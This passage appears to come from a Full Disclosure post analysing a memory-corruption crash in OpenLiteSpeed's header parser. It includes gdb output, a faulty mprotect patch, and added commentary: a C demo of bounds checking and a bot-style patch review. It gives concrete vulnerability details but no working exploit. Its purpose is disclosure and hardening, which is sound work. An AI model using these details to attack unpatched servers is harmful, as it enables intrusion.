    ++*(((int *)p) + 1);                 // wtf?!
    return (key_value_pair *)(p + sizeof(int) * 2) + used;
}
gdb:
Breakpoint 1, HttpReq::newKeyValueBuf (this=0x619000014fa0,
idxOff=@0x619000015090: 0x3e4) at httpreq.cpp:723
723 // 0xa
gdb-peda$
p = 0x61d00000cc64 "(" // p fucked up for some reason
orgSize = 0x28
newSize = 0x0
used = 0x74682e35
$164 = 0x74682e35 // *(((int *)p) + 1)
$165 = 0x28 // *((int *)p)
$166 = 0x74682e36 // ++*(((int *)p) + 1)
Program received signal SIGSEGV, Segmentation fault.
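The crash above comes from newKeyValueBuf treating two ints it reads out of m_reqBuf at idxOff as a (capacity, used) pair and indexing with `used` straight away; in the gdb session that word is 0x74682e35, which is ASCII request data ("5.ht" little-endian), not a counter. The C program below is an added example, not OpenLiteSpeed code: it computes the slot offset the way newKeyValueBuf does next to a version that validates the in-band counters and checks that the resulting slot lies inside the buffer, and runs both over a constructed request buffer with the index block at 0x3e4 holding the sane and the corrupted values from the session. The key_value_pair layout (four ints), the 4096-byte buffer and the sane counter value 3 are assumptions; the offsets are computed in integer arithmetic so the demo itself never dereferences anything.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed slot layout; the real key_value_pair is not on the page. */
typedef struct {
    int keyOff, keyLen, valOff, valLen;
} key_value_pair;

typedef struct {
    char  *buf;
    size_t len;
} reqbuf_t;

#define REQ_LEN      4096          /* constructed request buffer size */
#define IDX_OFF      0x3e4         /* m_headerIdxOff from the gdb session */
#define ORG_SIZE     0x28          /* orgSize from the gdb session */
#define USED_SANE    3             /* constructed, plausible value */
#define USED_CORRUPT 0x74682e35    /* `used` as read in the crashing session */

/* Mirrors newKeyValueBuf: read (orgSize, used) at idxOff and return the byte
   offset of slot number `used`, trusting both counters. */
static long long slot_offset_unchecked(const reqbuf_t *rb, int idxOff)
{
    const char *p = rb->buf + idxOff;
    int orgSize, used;
    memcpy(&orgSize, p, sizeof orgSize);
    memcpy(&used, p + sizeof(int), sizeof used);
    if (used == orgSize)
        return -2;                       /* grow path, not modelled here */
    return (long long)idxOff + (long long)(2 * sizeof(int))
         + (long long)used * (long long)sizeof(key_value_pair);
}

/* Hardened: the index block must fit in the buffer, both counters must be
   sane (0 <= used < orgSize), and the slot handed back must lie entirely
   inside the buffer. Anything else is treated as corruption. */
static long long slot_offset_checked(const reqbuf_t *rb, int idxOff)
{
    const size_t hdr = 2 * sizeof(int);
    if (idxOff < 0 || (size_t)idxOff > rb->len || rb->len - (size_t)idxOff < hdr)
        return -1;
    const char *p = rb->buf + idxOff;
    int orgSize, used;
    memcpy(&orgSize, p, sizeof orgSize);
    memcpy(&used, p + sizeof(int), sizeof used);
    if (orgSize <= 0 || used < 0 || used >= orgSize)
        return -1;                       /* corrupted (or full) index block */
    size_t slot_end = (size_t)idxOff + hdr
                    + ((size_t)used + 1) * sizeof(key_value_pair);
    if (slot_end > rb->len)
        return -1;                       /* slot would leave the buffer */
    return (long long)((size_t)idxOff + hdr + (size_t)used * sizeof(key_value_pair));
}

/* Build the constructed request buffer with an index block at idxOff. */
static reqbuf_t make_req(char *storage, size_t len, int idxOff,
                         int orgSize, int used)
{
    memset(storage, 0, len);
    memcpy(storage + idxOff, &orgSize, sizeof orgSize);
    memcpy(storage + idxOff + sizeof(int), &used, sizeof used);
    return (reqbuf_t){ storage, len };
}

/* Run one scenario: `used` as stored in the index block, hardened or not. */
static long long run_demo(int used, int hardened)
{
    static char storage[REQ_LEN];
    reqbuf_t rb = make_req(storage, REQ_LEN, IDX_OFF, ORG_SIZE, used);
    return hardened ? slot_offset_checked(&rb, IDX_OFF)
                    : slot_offset_unchecked(&rb, IDX_OFF);
}

int main(void)
{
    printf("sane    unchecked: %lld  checked: %lld  (buffer is %d bytes)\n",
           run_demo(USED_SANE, 0), run_demo(USED_SANE, 1), REQ_LEN);
    printf("corrupt unchecked: %lld  checked: %lld\n",
           run_demo(USED_CORRUPT, 0), run_demo(USED_CORRUPT, 1));
    return 0;
}
```

With the sane counter both versions agree on the slot; with the corrupted one the unchecked arithmetic lands about 29 GB past a 4 KB buffer (the write to it is the SEGV in the ASAN trace), while the checked version refuses. Any value the parser stores inside the same buffer that later holds attacker-supplied bytes has to be revalidated before it is used as a count or an offset.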
fucked up patch:
--- src/http/httpreq.cpp.orig 2015-04-24 01:52:23.641459379 +0200
+++ src/http/httpreq.cpp 2015-04-24 17:17:50.169166351 +0200
@@ -49,6 +49,8 @@
#include <stdlib.h>
#include <unistd.h>
+#include <sys/mman.h>
+
#include <new>
#include <util/ssnprintf.h>
@@ -539,6 +541,11 @@ int HttpReq::processHeaderLines()
}
else
{
+ if (mprotect(&pCurHeader, sizeof(key_value_pair),
PROT_READ|PROT_WRITE) == -1) {
+ LOG_INFO(("[%s] Status 500: failed on
mprotect()!", getLogId()));
+ return SC_500;
+ }
+
pCurHeader = newUnknownHeader();
pCurHeader->keyOff = pLineBegin - m_headerBuf.begin();
pCurHeader->keyLen = skipSpace(pMark, pLineBegin) - pLineBegin;
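Review bot: `mprotect(&pCurHeader, sizeof(key_value_pair), PROT_READ|PROT_WRITE)` acts on the page holding the local pointer variable pCurHeader, not on the request buffer the crash reads from, and because `&pCurHeader` is not page aligned the call fails with EINVAL, so with this hunk every request that carries an unknown header is answered with SC_500. The fault (httpreq.cpp:543 in the ASAN trace) is newKeyValueBuf trusting the (orgSize, used) pair it reads from m_reqBuf at m_headerIdxOff; the gdb dump shows used = 0x74682e35, which is ASCII ("5.ht") rather than a counter, i.e. the index block has been overwritten by or the offset points into header text. The guard belongs in newKeyValueBuf: reject or re-initialise the block when `used < 0`, `used > orgSize`, or `p + 2*sizeof(int) + (used+1)*sizeof(key_value_pair)` would lie outside m_reqBuf, and return an error from processHeaderLines in that case instead of indexing. Also, the `+` lines of this hunk are mail-wrapped (the continuations lack markers), so it will not apply as posted.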
#3:
In case you were wondering: yes, there are more bugs sitting out there, for
example one that was found independently:
http://www.security-assessment.com/files/documents/advisory/Open%20Litespeed%20Use%20After%20Free%20Vulnerability.pdf
ThE EnD
YXV0aG9ycyBvZiB0aGlzIGdlbSBhcmUqOgpjOGU3NGViZDgzOTJmZGE0Nzg4MTc5ZjlhMDJiYjQ5
MzM3NjM4ZTdiCmIxZjk4Nzg5Y2MwM2Q2YTBkYjJlOGJkMzA5ZjlmMjNiNmU1NDY5M2UKZmMzYzNm
NjM3NGFhNDQ0ZTc4Yzk0ZmQ0NjkyNWY5NGUxM2Y5YjU4NgoxMjBhZGNmOTczZTI4NGJmM2YzMjNl
NGVhMGFlZjlmNWQ5ZjNiZGU5CgoqIFphIGV3ZW50dWFsbmUga29saXpqZSBuaWUgb2Rwb3dpYWRh
bXkuCg==
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/